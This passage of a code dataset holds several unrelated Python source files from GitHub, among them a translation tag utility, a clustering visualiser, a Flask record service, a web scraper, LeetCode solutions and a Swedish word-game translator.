next_smaller_coin(biggest_coin))","repo_name":"KeyboardxPang/cs61a","sub_path":"hw/hw03/hw03.py","file_name":"hw03.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30569363656","text":"import re\nimport utilities.misc as misc\nfrom config.regex_patterns import patterns, hindi_numbers\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nfrom utilities import MODULE_CONTEXT\nimport numpy as np\n\n'''\nBelow funtions are meant to handle date, numbers and URls as part of pre and post translation processing\n'''\n\ndef tag_number_date_url(text):\n '''\n Tags numbers, dates and url in the input text and returns\n tagged text and the arrays of numbers,dates and urls\n '''\n try: \n if len(text) == 0:\n return \"\",\"\",\"\",\"\",\"\"\n \n resultant_str = list()\n count_date = 0\n date_original = list()\n count_url = 0\n url_dict = {}\n \n num_array,text,num_map = build_src_num_array(text)\n #log_info(\"number-tag mappings-{}\".format(num_map),MODULE_CONTEXT)\n for word in text.split():\n try:\n if misc.token_is_url(word) or misc.token_is_email(word):\n url_or_email = word\n word = 'UuRrLl'+str(count_url)\n url_dict[word] = url_or_email\n count_url +=1\n except Exception as e:\n log_exception(\"In handle_date_url:tag_num function:{}\".format(e),MODULE_CONTEXT,e)\n word = word\n \n resultant_str.append(word) \n s = [str(i) for i in resultant_str] \n res = str(\" \".join(s)) \n #log_info(\"tagged response:{} and date:{} and url:{}\".format(res,date_original,url_dict),MODULE_CONTEXT) \n\n return res,date_original,url_dict,num_array,num_map \n\n except Exception as e:\n log_exception(\"In handle_date_url:tag_num function parent except block:{}\".format(e),MODULE_CONTEXT,e)\n return text,[],[],(num_array or []),(num_map or [])\n\ndef replace_tags_with_original(text,date_original,url_dict,num_array,num_map):\n '''\n Replaces dates,urls and numbers in the text with the original values\n in place of the tags\n '''\n try: \n res = text\n \n if len(text) == 0:\n return \"\"\n\n for url_tag,url in url_dict.items():\n res = text.replace(url_tag,url)\n\n #log_info(\"response after url and date replacemnt:{}\".format(res),MODULE_CONTEXT) \n \n if len(num_map) == 0:\n ''' handling the case when model outputs a tag which is not in tagged_src(src is without any number'''\n for char in reversed(hindi_numbers): \n res = re.sub(r'NnUuMm'+char,\"\",res)\n num_map.reverse()\n for item in num_map:\n res = res.replace(item['tag'],str(item['no.']),1)\n \n res = remove_extra_tags(res) \n #log_info(\"response after tags replacement:{}\".format(res),MODULE_CONTEXT)\n return res \n except Exception as e:\n log_exception(\"Error in parent except block of replace_tags_with_original_1 function, returning tagged output:{}\".format(e),MODULE_CONTEXT,e)\n return res\n\ndef get_indices_of_num_with_zero_prefix(num_arr):\n ''' eg. 
'000','049' '''\n i = [i for i,j in enumerate(num_arr) if j.startswith(str(0))]\n return i\n\ndef update_num_arr(num_array,zero_prefix_num,i_zero,num_array_orignal):\n '''\n This is function is meant to handle zero prefix numbers like 09 or 000 which are converted to 9 or 0 during processing, We want them in original form i.e 09\n zero_prefix_num: this is the num that has to be transformed back with zero prefix(from 9 to 09, or, 0 to 000 originally)\n i_zero: indices of numbers with zero prefix in num_array_orignal\n ind: indices of zero prefix numbers in num_array descending\n\n Note: this function needs some fixing\n '''\n try:\n num_array_o = None\n num_array_o = num_array[:]\n \n ind = list()\n zero_prefix_num = np.unique(np.array(zero_prefix_num))\n for i in zero_prefix_num:\n for j,m in enumerate(num_array):\n if m == i:\n ind.append(j)\n for k,l in enumerate(ind):\n num_array[l] = num_array_orignal[i_zero[k]]\n return num_array\n except Exception as e:\n log_exception(\"Error in handle_date_url:update_num_arr,returning incoming num_array:{}\".format(e),MODULE_CONTEXT,e)\n return num_array_o\n \ndef build_src_num_array(i_text):\n num_map,num_dict = list(),{}\n count_number = 0\n all_patterns = patterns['p12']['regex']\n src_num_array = re.findall(all_patterns,i_text)\n int_num_array = list(map(lambda y:y.replace(',',''), src_num_array))\n int_num_array = list(map(int, int_num_array))\n num_dict = {k:v for (k,v) in zip(int_num_array,src_num_array)}\n int_num_array.sort(reverse=True)\n for k,v in enumerate(int_num_array):\n i_text = i_text.replace(num_dict[v],'NnUuMm'+str(hindi_numbers[count_number]),1)\n num_map.append({\"no.\":num_dict[v],\"tag\":'NnUuMm'+str(hindi_numbers[count_number])})\n count_number +=1\n if count_number >30:\n log_info(\"count exceeding 30,triggering break\",MODULE_CONTEXT)\n count_number = 30\n break\n\n return int_num_array,i_text,num_map\n \ndef remove_extra_tags(text):\n '''\n This funtion is meant for removing extra num,date and url tags from the output \n '''\n if len(re.findall(r'NnUuMm.', text)) > 0:\n ''' \n if model outputs extra tag than the number of count in num_map or \n some unreplaced tags, removing them from final output\n '''\n for char in reversed(hindi_numbers): \n text = re.sub(r'NnUuMm'+char,\"\",text) \n \n if len(re.findall(r'DdAaTtEe.', text)) > 0:\n ''' \n If any' unreplaced Date tag is still left, removing it in final output'\n Assuming in input there wont be more than 9 date patterns\n '''\n text = re.sub(r'DdAaTtEe.',\"\",text) \n \n if len(re.findall(r'UuRrLl.', text)) > 0:\n ''' \n If any' unreplaced url tag is still left, removing it in final output'\n Assuming in input there wont be more than 9 url patterns\n '''\n text = re.sub(r'UuRrLl.',\"\",text) \n \n return text ","repo_name":"Abhilash-tarento/anuvaad","sub_path":"anuvaad-nmt-inference/src/utilities/tagger_util.py","file_name":"tagger_util.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"13258301655","text":"from itertools import cycle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom time import time\nfrom typing import Any, Tuple\nfrom stqdm import stqdm\nimport streamlit as st\n\n\ndef compute_responsibility(\n S: np.ndarray, R: np.ndarray, A: np.ndarray, damping_factor: float = 0.5\n) -> np.ndarray:\n \"\"\"\n S: n by n matrix of similarities\n R: n by n matrix of current responsibilities\n A: n by n matrix of current availabilities\n damping_factor: Damping factor 
used to calculate new responsibilities. Acts as weight\n for the weighted sum of the old and new responsibilities.\n Returns matrix containing the new responsibilities.\n \"\"\"\n n = S.shape[0]\n\n AS = S + A\n rows = np.arange(n)\n np.fill_diagonal(AS, -np.inf)\n\n idx_max = np.argmax(AS, axis=1)\n first_max = AS[rows, idx_max]\n\n AS[rows, idx_max] = -np.inf\n second_max = AS[rows, np.argmax(AS, axis=1)]\n\n max_matrix = np.zeros_like(R) + first_max[:, None]\n max_matrix[rows, idx_max] = second_max\n\n new_R = R * damping_factor + (1 - damping_factor) * (S - max_matrix)\n return new_R\n\n\ndef compute_availability(\n R: np.ndarray, A: np.ndarray, damping_factor: float = 0.5\n) -> np.ndarray:\n \"\"\"\n R: n by n matrix of current responsibilities\n A: n by n matrix of current availabilities\n damping_factor: Damping factor used to calculate new availabilities. Acts as weight\n for the weighted sum of the old and new availabilities.\n Returns matrix containing the new availabilities.\n \"\"\"\n n = R.shape[0]\n k_idx = np.arange(n)\n a = np.array(R)\n a[a < 0] = 0\n np.fill_diagonal(a, 0)\n a = a.sum(axis=0)\n a = a + R[k_idx, k_idx]\n\n a = np.ones(A.shape) * a\n\n a -= np.clip(R, 0, np.inf)\n a[a > 0] = 0\n\n a_ = np.array(R)\n np.fill_diagonal(a_, 0)\n\n a_[a_ < 0] = 0\n\n a[k_idx, k_idx] = a_.sum(axis=0)\n\n new_A = A * damping_factor + (1 - damping_factor) * a\n\n return new_A\n\n\ndef similarity(u: np.ndarray, v: np.ndarray):\n return -((u - v) ** 2).sum()\n\n\ndef create_matrices(X: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n S = np.zeros((X.shape[0], X.shape[0]))\n R = np.array(S)\n A = np.array(S)\n\n for i in range(X.shape[0]):\n for j in range(X.shape[0]):\n S[i, j] = similarity(X[i], X[j])\n\n return A, R, S\n\n\ndef give_preferences(\n S: np.ndarray, preference: Any = \"median\"\n) -> Tuple[np.ndarray, int]:\n if preference == \"median\":\n indices = np.where(~np.eye(S.shape[0], dtype=bool))\n m = np.median(S[indices])\n elif type(preference) == np.ndarray:\n m = preference\n else:\n try:\n m = float(preference)\n except ValueError:\n raise ValueError(\n \"Parameter 'preference' must either be 'median', a np.ndarray or a scalar.\"\n )\n\n np.fill_diagonal(S, m)\n return S, m\n\n\ndef affinity_prop(\n X: np.ndarray,\n maxiter: int = 100,\n preference: Any = \"median\",\n damping_factor: float = 0.5,\n local_thresh: int = 10,\n data_plot=None,\n fig=None,\n ax=None,\n c: st.empty = None,\n):\n \"\"\"\n Params:\n X: Input matrix with data to cluster.\n maxiter: Maximum iterations after which to stop the clustering if it\n does not converge before.\n preference: Either 'median' (default), a vector of the same size as the input data,\n or a fixed scalar value. Determines the initial \"preferences\", i.e., self-similarities:\n values on the diagonal of the similarity matrix. Details in the README.\n damping_factor: Damping factor used to calculate new availabilities and\n responsibilities. 
Acts as weight for the weighted sum of\n the old and new availabilities or responsibilities.\n local_thresh: Number of iterations without any change in the outcome labels before the algorithm stops.\n data_plot: If not None, a function that takes a figure and axes as input and plots the data.\n fig: If not None, the figure to plot the data on.\n ax: If not None, the axes to plot the data on.\n c: If not None, the container to print logs on.\n \"\"\"\n\n X = np.asarray(X)\n A, R, S = create_matrices(X)\n S, p = give_preferences(S, preference=preference)\n log = \"\"\n log += f\"Initial preferences: {p} \\n \"\n\n count_equal = 0\n i = 0\n converged = False\n\n for i in stqdm(range(maxiter), st_container=st.sidebar):\n c.write(log)\n E_old = R + A\n labels_old = np.argmax(E_old, axis=1)\n R = compute_responsibility(S, R, A, damping_factor=damping_factor)\n A = compute_availability(R, A, damping_factor=damping_factor)\n E_new = R + A\n labels_cur = np.argmax(E_new, axis=1)\n\n if i % 5 == 0:\n exemplars = plot_iteration_n_get_exemplars(\n X, labels_cur, data_plot, fig, ax, c\n )\n log += f\"Iteration {i}: found {len(exemplars)} exemplars \\n \"\n\n if np.all(labels_cur == labels_old):\n count_equal += 1\n else:\n count_equal = 0\n\n if count_equal > local_thresh:\n converged = True\n break\n\n if converged:\n log += f\"Converged after {i} iterations. \\n \"\n else:\n log += f\"Did not converge after {i} iterations. \\n \"\n c.write(log)\n\n E = R + A\n plot_iteration_n_get_exemplars(X, labels_cur, data_plot, fig, ax, c)\n labels = np.argmax(E, axis=1)\n exemplars = np.unique(labels)\n centers = X[exemplars]\n c.write(log + f\"{len(exemplars)} exemplars found.\")\n\n return exemplars, labels, centers\n\n\ndef plot_iteration_n_get_exemplars(\n data: np.ndarray, labels, data_plot=None, fig=None, ax: plt.Axes = None, c=None\n) -> np.ndarray:\n exemplars = np.unique(labels)\n colors = dict(zip(exemplars, cycle(\"bgrcmyk\")))\n ax.clear()\n for i in range(len(labels)):\n if i in exemplars:\n exemplar = i\n edge = \"k\"\n ms = 10\n else:\n exemplar = labels[i]\n ms = 3\n edge = None\n ax.plot(\n [data[i][0], data[exemplar][0]],\n [data[i][1], data[exemplar][1]],\n c=colors[exemplar],\n )\n ax.plot(\n data[i][0],\n data[i][1],\n \"o\",\n c=colors[exemplar],\n markersize=ms,\n markeredgecolor=edge,\n )\n data_plot.pyplot(fig)\n return exemplars\n","repo_name":"sk1tter/affinity-propagation-visualization","sub_path":"affinity_propagation.py","file_name":"affinity_propagation.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36112958694","text":"from typing import Dict, List\r\nfrom pandas import DataFrame\r\nfrom DataI.Models.TableModel import TableModel\r\n\r\n\r\nclass FileSaver():\r\n fullFilePath = str\r\n\r\n def __init__(self, fullFilePath):\r\n self.fullFilePath = fullFilePath\r\n\r\n @classmethod\r\n def tableToDataFrameConverter(cls, table: TableModel) -> DataFrame:\r\n return DataFrame(cls.__getTableAsListOfRows(table), columns=cls.__getColumnsNames(table))\r\n\r\n @classmethod\r\n def __getTableAsListOfRows(cls, table: TableModel) ->List[list]:\r\n rowsCount = len(table.columns[0].cells)\r\n tableList = list()\r\n for i in range(rowsCount):\r\n bufferRowList = list()\r\n for j in range(len(table.columns)):\r\n bufferRowList.append(table.columns[j].cells[i].value)\r\n tableList.append(bufferRowList)\r\n\r\n return tableList[1:]\r\n\r\n @classmethod\r\n def __getColumnsNames(cls, table: 
TableModel) -> List[str]:\r\n        names = list()\r\n        for column in table.columns:\r\n            names.append(column.name)\r\n        return names\r\n\r\n\r\n\r\n","repo_name":"presenters-group/DataI","sub_path":"API/DataI/Controllers/FileSaver/FileSaver.py","file_name":"FileSaver.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39016945507","text":"nums = [ 2,7,11,15 ]\ntarget = 9\n\ndef two_sum(arr,sum):\n    for i in range(len(arr)):\n        for j in range(i+1,len(arr)):\n            if arr[i]+arr[j]==sum:\n                return(i,j)\n\nprint(two_sum(nums,target))","repo_name":"PragmatechEducation/LeetCode-Top-Interview-Questions","sub_path":"TwoSum-Python.py","file_name":"TwoSum-Python.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30866385479","text":"class Solution:\n    def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n        dp = [[0] * (n + 1) for i in range(m + 1)]\n        for s in strs:\n            zero_count = one_count = 0\n            for c in s:\n                if c == '0':\n                    zero_count += 1\n                else:\n                    one_count += 1\n            for zeroes in range(m, zero_count - 1, -1):\n                for ones in range(n, one_count - 1, -1):\n                    dp[zeroes][ones] = max(1 + dp[zeroes - zero_count][ones - one_count], dp[zeroes][ones])\n        return dp[m][n]\n\n    ","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13998597819","text":"\r\nfrom requests import get, utils\r\nfrom decimal import Decimal\r\n\r\ndef currency_rates(char_code):\r\n    response = get('http://www.cbr.ru/scripts/XML_daily.asp')\r\n    encodings = utils.get_encoding_from_headers(response.headers)\r\n    server_date = response.headers['Set-Cookie'].split(',')[1]\r\n    print(f'Server date: {server_date}')\r\n\r\n    content = response.content.decode(encoding=encodings)\r\n\r\n    currency_dict = {}\r\n    for n in content.split(''): # Find the currency code and its value\r\n        i = n.split('')[0][-3:]\r\n        currency_dict[i] = n[-7:] if i.isalpha() else None # Build a dict of currencies and their values\r\n\r\n    char_code = char_code.upper()\r\n    if currency_dict.setdefault(char_code) == None:\r\n        print('Invalid currency code')\r\n    else: # If the key is in the dict, print the currency value\r\n        price = Decimal(currency_dict[char_code].replace(',', '.')).quantize(Decimal('0.01'))\r\n        print(f'{char_code} = {price} RUB')\r\n\r\ncurrency_rates(input('Enter a currency in the format (USD,usd): '))\r\n","repo_name":"nail14/GeekBrains_DZ","sub_path":"home work/DZ_4/DZ_4_2.py","file_name":"DZ_4_2.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11097435602","text":"from flask import Flask, jsonify, request\nfrom argparse import ArgumentParser\nimport json\nimport threading\nimport sys\n\napp = Flask(__name__)\nRECORDS = []\nRECORD_LOCK = threading.Lock()\n\n\n@app.route('/simpleservice/api/v1.0/status', methods=['GET'])\ndef get_status():\n    \"\"\"clients can use this method to see if the service is alive and kicking\"\"\"\n    return \"OK\" # defaults to a 200 HTTP status return code\n\n\n# standard URL for a REST API\n@app.route('/simpleservice/api/v1.0/shutdown', methods=['POST'])\ndef shutdown():\n    \"\"\"clean method to shut down the flask/web 
server\"\"\"\n shutdown_func = request.environ.get(\n 'werkzeug.server.shutdown') # default web server with flask\n if shutdown_func is None:\n return 'unable to shutdown server!', 501\n shutdown_func()\n return \"server shutting down...\"\n\n\n# can also handle all methods in a single\n@app.route('/simpleservice/api/v1.0/record', methods=['GET'])\n# handler ['GET', 'POST, 'PUT', DELETE' ]\ndef get_records():\n \"\"\"get a list of all dictionary records and return as a JSON file\"\"\"\n with RECORD_LOCK: # since flask 1.0 multi-threaded is enabled by default\n return jsonify(RECORDS)\n\n\n@app.route('/simpleservice/api/v1.0/record/', methods=['GET'])\ndef get_record_by_name(name):\n \"\"\"uses construct in route to pass a record parameter to route handler\"\"\"\n with RECORD_LOCK:\n # return list of matches or []\n return jsonify([r for r in RECORDS if r.get('name') == name])\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['POST'])\ndef add_record():\n \"\"\"add a record to the global structure\"\"\"\n if 'json' not in request.files:\n # use an HTML record that seems appropriate\n return \"no json file in the request!\", 400\n try:\n # can't assume that JSON file is valid\n _record = json.loads(request.files['json'].read())\n except ValueError:\n return \"failed to parse JSON file correctly!\", 400\n if type(_record) is not dict or 'name' not in _record:\n return \"expecting a dictionary with identifier, post failed!\", 400\n with RECORD_LOCK:\n # just check if the name already exists in the global RECORD list\n if len([r for r in RECORDS if r.get('name') == _record['name']]):\n return \"already in the records!\", 409\n RECORDS.append(_record)\n return \"OK\"\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['PUT'])\ndef update_record():\n \"\"\"route that updates an existing record - expects a JSON file as input\"\"\"\n if 'json' not in request.files:\n return \"no json file in the request!\", 400\n try:\n _record = json.loads(request.files['json'].read())\n except ValueError:\n return \"failed to parse JSON file correctly!\", 400\n if type(_record) is not dict or 'name' not in _record:\n return \"expecting a dictionary with a name, post failed!\", 400\n with RECORD_LOCK:\n for _index, _rec in enumerate(RECORDS):\n if _rec['name'] == _record['name']:\n RECORDS[_index] = _record\n return \"OK\"\n return \"Failed to update record!\", 500\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['DELETE'])\ndef remove_record():\n \"\"\"route that removes a record from the global structure\"\"\"\n # could use .../record/ in URL or as in this case as an argument .../record?name=bob\n if 'name' not in request.args:\n return \"need a name to delete a record!\", 400\n with RECORD_LOCK:\n if len([r for r in RECORDS if r.get('name') == request.args.get('name')]) == 0:\n return \"no such record found!\", 409\n RECORDS[:] = [r for r in RECORDS if r.get( # copy all but name matches\n 'name') != request.args.get('name')]\n return \"OK\"\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('-e', '--external',\n dest='external',\n action='store_true',\n help=\"run as external server\")\n parser.add_argument('-p', '--port',\n type=int,\n default=5000,\n help=\"port number to use\")\n args = parser.parse_args()\n if args.external:\n # service can be accessed from an external PC\n app.run(debug=False, host='0.0.0.0', port=args.port)\n else:\n # available on localhost e.g. 
127.0.0.1\n app.run(debug=True, port=args.port)\n sys.exit(0)\n","repo_name":"duckherder/simple-flask-rest-api","sub_path":"simpleservice.py","file_name":"simpleservice.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332654740","text":"import requests\nimport time\nimport sqlite3\nfrom lxml import html\n\n\ndef getElem(bacteria):\n url = \"http://www.timetree.org/ajax/name/timeline/\" + bacteria + \"?select_tag_id=timeline-resolve-target\"\n content = requests.get(url).text\n tree = html.fromstring(content)\n num = tree.xpath(\"//div/div/select/option/@value\")[0]\n\n url2 = \"http://www.timetree.org/ajax/timeline/\" + num + \"?taxon=\" + bacteria + \"&selected=\" + num\n content2 = requests.get(url2).text\n tree2 = html.fromstring(content2)\n values = tree2.xpath(\"//svg[7]/text/text()\")\n final_value = [(values[i], values[i + int(len(values) / 2)]) for i in range(int(len(values) / 2)) if\n values[i + int(len(values) / 2)] != '0']\n return final_value\n\n\nstart = time.time()\ncommon_dict = {}\nf = open(\"spisok.txt\", \"r\")\nlst = [(line.strip()).split(\" \")[0] for line in f]\nlst = set(map(lambda x: x if ord(x[0]) != 12 else x[1:], filter(lambda el: len(el) > 1, lst)))\nprint(len(lst))\nfor bact in lst:\n try:\n common_dict[bact] = getElem(bact)\n except IndexError:\n continue\nf.close()\n\nconn = sqlite3.connect('bacteries.db')\nc = conn.cursor()\nc.execute('''CREATE TABLE if not exists taxons(id INTEGER PRIMARY KEY AUTOINCREMENT, name CHAR(30) NOT NULL, UNIQUE(name))''')\nc.execute('CREATE INDEX bact_name on taxons(name)')\nc.execute('''CREATE TABLE if not exists divergence (first_id INTEGER, second_id INTEGER, diverg INTEGER,\n FOREIGN KEY (first_id) REFERENCES taxons(id), FOREIGN KEY (second_id) REFERENCES taxons(id),\n PRIMARY KEY (first_id, second_id))''')\n\nfor key in common_dict:\n c.execute(\"SELECT * FROM taxons WHERE name = (?)\", (key,))\n if not c.fetchone():\n c.execute(\"INSERT INTO taxons (name) VALUES (?)\", (key,))\n for values in common_dict[key]:\n c.execute(\"SELECT * FROM taxons WHERE name = (?)\", (values[0],))\n if not c.fetchone():\n c.execute(\"INSERT INTO taxons (name) VALUES (?)\", (values[0],))\n\nfor key in common_dict:\n for name, date in common_dict[key]:\n c.execute(\"SELECT id FROM taxons WHERE name=?\", (key,))\n child_id = c.fetchone()[0]\n c.execute(\"SELECT id FROM taxons WHERE name=?\", (name,))\n parent_id = c.fetchone()[0]\n c.execute('''INSERT INTO divergence (first_id, second_id, diverg) VALUES\n (?, ?, ?)''', (child_id, parent_id, date,))\n\nconn.commit()\nconn.close()\nend = time.time()\nprint(\"{0:.2f} seconds\".format(end - start))","repo_name":"liquidbrainisstrain/ouroboros","sub_path":"old_tools/bact.py","file_name":"bact.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74021654632","text":"import os\nimport unittest\nfrom pyparsing import ParseException\nfrom server.parser import RobotLanguage\n\ncurrent_path = os.path.split(os.path.realpath(__file__))[0]\n\n\nclass TestRobotLanguage(unittest.TestCase):\n def test_parse_files(self):\n with open(os.path.join(current_path, \"parser/result1.txt\"), \"r\") as f:\n result = f.readline().strip()\n self.assertEqual(repr(RobotLanguage.parse_files([os.path.join(current_path, \"parser/case1.txt\")])), result)\n with open(os.path.join(current_path, \"parser/result2.txt\"), \"r\") 
as f:\n result = f.readline().strip()\n self.assertEqual(repr(RobotLanguage.parse_files([os.path.join(current_path, \"parser/case2.txt\")])), result)\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case3.txt\")]),\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case4.txt\")]),\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case5.txt\")]),\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"xqmmcqs/robot-DSL","sub_path":"test/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"23484412155","text":"# EXERCISE 43 VIDEO GAME - BMR version\r\nimport bmr_ex43_scenes\r\nfrom sys import exit\r\n\r\n\r\nclass Engine(object):\r\n def __init__(self, scene_map):\r\n self.scene_map = scene_map # an instance of Map(object) !!!\r\n\r\n def play(self):\r\n current_scene = self.scene_map.opening_scene()\r\n last_scene = self.scene_map.next_scene('finished')\r\n\r\n while current_scene != last_scene:\r\n next_scene_name = current_scene.enter()\r\n current_scene = self.scene_map.next_scene(next_scene_name)\r\n \r\n current_scene.enter()\r\n\r\nclass Map(object):\r\n\r\n scenes = {\r\n 'dark_forest': bmr_ex43_scenes.DarkForest() ,\r\n 'the_river': bmr_ex43_scenes.TheRiver() ,\r\n 'death': bmr_ex43_scenes.Death() ,\r\n 'finished': bmr_ex43_scenes.Finished()\r\n }\r\n\r\n def __init__(self, start_scene):\r\n self.start_scene = start_scene\r\n\r\n def next_scene(self, scene_name):\r\n val = Map.scenes.get(scene_name)\r\n return val\r\n\r\n def opening_scene(self):\r\n return self.next_scene(self.start_scene)\r\n\r\na_map = Map('dark_forest')\r\na_game = Engine(a_map)\r\na_game.play()\r\n\r\n\r\n","repo_name":"uwl-python-ig/lp3thw","sub_path":"ex43/bmr_ex43_main.py","file_name":"bmr_ex43_main.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22234412194","text":"#!/usr/bin/env python\n\nimport argparse\n\nconsonants = \"bcdfghjklmnpqrstvwxzBCDFGHJKLMNPQRSTVWZ\"\nvowels = \"aeiouyåäöAEIOUYÅÄÖ\"\nstring = \"Vad kul Python programmering är\"\nrovarstring = \"VoVadod kokulol PoPytothohonon poprorogogroramommomerorinongog äror\"\n\n\n# Stjärnspråket: en stjärna läggs till efter varje bokstav.\n# \"Stjärna\" blir S*t*j*ä*r*n*a.\n# Här har vi dock ändrat koden litet till en modul rubrik.\ndef stjarnsprak(lanuage):\n print(\"\".join(\n l + '*' # Lägg till en stjärna efter aktuell bokstav.\n # Kolla om aktuell bokstav är med i våra definierade strängar...\n if l in consonants\n or l in vowels\n else l # Annars ersätter vi med ett frågettecken.\n for l in lanuage))\n\n\n# Viskspråket: alla vokaler tas bort.\n# Om man matar in \"kor\" blir det k + ' ' + r = \"k r\".\ndef visksprak(lanuage):\n print(\"Viskspråket: \" + \"\".join(\n ' ' # Mellanslag ersätter aktuell vokal.\n if l in vowels # Kolla om aktuell bokstav är en vokal.\n else l # Annars lägg bara till akuell bokstav till den nya strängen.\n for l in lanuage) # Loopa igenom alla inmatade bokstäver och gör ovan tills texten är slut.\n + \"\\n\")\n\n\n# Rövarspråket: alla konsonanter fördubblas och 'o' stoppas in emellan.\n# \"kor\" blir k + (o + k) + o + r + (o + r) = \"kokoror\".\ndef rovarsprak(lanuage):\n print(\"\".join(\n # Lägg 
till o efter aktuell bokstav och lägg even till en kopia av bokstaven efter o.\n l + 'o' + l\n if l in consonants # Kolla om aktuell bokstav är en konsonant.\n else l # Annars lägg bara till akuell bokstav till den nya strängen.\n for l in lanuage) # Loopa igenom alla inmatade bokstäver och gör ovan tills texten är slut.\n + \"\\n\")\n\n\n# Rövarspråket: alla konsonanter fördubblas och 'o' stoppas in emellan.\n# Denna funktion där bort vokalen och dubbletten av varje funnen konsonant, vid varje loop.\ndef svenskarovarsprak(language):\n # translation = \"\"\n for i in range(0, len(language)):\n if i < len(language) and language[i] in consonants:\n language = language[:i] + language[i + 2:]\n # translation = language[:i + 1]\n # range tar hela aktuella input strängen. Strängen förkortas genom slice.\n # Vi ser först till att undvika string index out of range error genom att se till att i är\n # mindre än aktuella inputsträngens längd. Sedan kollar vi om det är en konsonant.\n # Sen gör vi en slice för att ta med alla tecken från början av inkommande rövarspråkssträng, fram till och med i.\n # Vi gör en ny slice för att bli av med en vokal och följande konsonant.\n # Vi sätter sen ihop rövarspråksträngen ingen, nu med minskad längd vilket påverkar\n # range i for loopen. Vi behöver inte translation variabeln men den kan användas under debugging\n # för att se hur itereringen fungerar.\n\n print(\"Översättning till Svenska från Rövarspråket: \" + language + \"\\n\")\n\n\n# Bebisar säger bara första stavelsen i varje ord men de säger den tre gånger:\n# En stavelse är alla tecken i ett ord fram till och med första vokalen.\ndef bebissprak(language):\n translation = \"\"\n cut_letters = \"\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_letters = l[:i + 1] * 3\n translation += cut_letters + \" \"\n break\n print(\"Bebisspråket: \" + translation + \"\\n\")\n\n\n# För varje ord: bokstäverna före första vokalen sätts sist och \"all\" läggs till på slutet.\ndef allspraket(language):\n translation = \"\"\n cut_consonants = \"\"\n all = \"all\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_consonants = l[:i]\n translation += l[i:] + cut_consonants + all + \" \"\n break\n\n print(\"Allspråket: \" + translation + \"\\n\")\n\n\n# Ordet kuperas som i allspråket fast efter första vokalen. 
\"fi\" sätts först och \"kon\" sist.\ndef fikonspraket(language):\n translation = \"\"\n cut_letters = \"\"\n fi = \"fi\"\n kon = \"kon\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_letters = l[:i + 1]\n translation += fi + l[i + 1:] + cut_letters + kon + \" \"\n break\n print(\"Fikonspråket: \" + translation + \"\\n\")\n\n\ndef bash(file, sprak):\n translation = \"\"\n\n with open(file) as filein:\n for line in filein:\n translation += line\n\n if sprak == \"ST\":\n stjarnsprak(translation)\n elif sprak == \"R\":\n rovarsprak(translation)\n elif sprak == \"S\":\n svenskarovarsprak(translation)\n elif sprak == \"B\":\n bebissprak(translation)\n elif sprak == \"A\":\n allspraket(translation)\n elif sprak == \"F\":\n fikonspraket(translation)\n elif sprak == \"V\":\n visksprak(translation)\n\n\ndef main():\n # Lägger till args\n parser = argparse.ArgumentParser(description=\"Odd Languages\")\n parser.add_argument(\n \"file\", help=\"Choose a file for translation: --file FILE\", type=str)\n parser.add_argument(\"--st\", help=\"Star Language --st ST\", type=str)\n parser.add_argument(\"--r\", help=\"Robber's language --r R\", type=str)\n parser.add_argument(\"--s\", help=\"Robber's To Swedish --s S\", type=str)\n parser.add_argument(\"--b\", help=\"Baby Language --b B\", type=str)\n parser.add_argument(\"--a\", help=\"All Language --a A\", type=str)\n parser.add_argument(\"--f\", help=\"Fig Language --f F\", type=str)\n parser.add_argument(\"--v\", help=\"Whisper Language --v V\", type=str)\n parser.add_argument(\"--lang\", help=\"Choose language for one line translation: St Ro Sv Be Al Fi LANG\\n\" +\n \" WHEN YOU USE ECHO: echo |.filename.py 'text to be translated' --spraak 'Ro' \")\n args = parser.parse_args()\n\n # Filöversättning\n if args.file != \"\":\n file = args.file\n if args.st == \"ST\":\n bash(file, \"ST\")\n if args.r 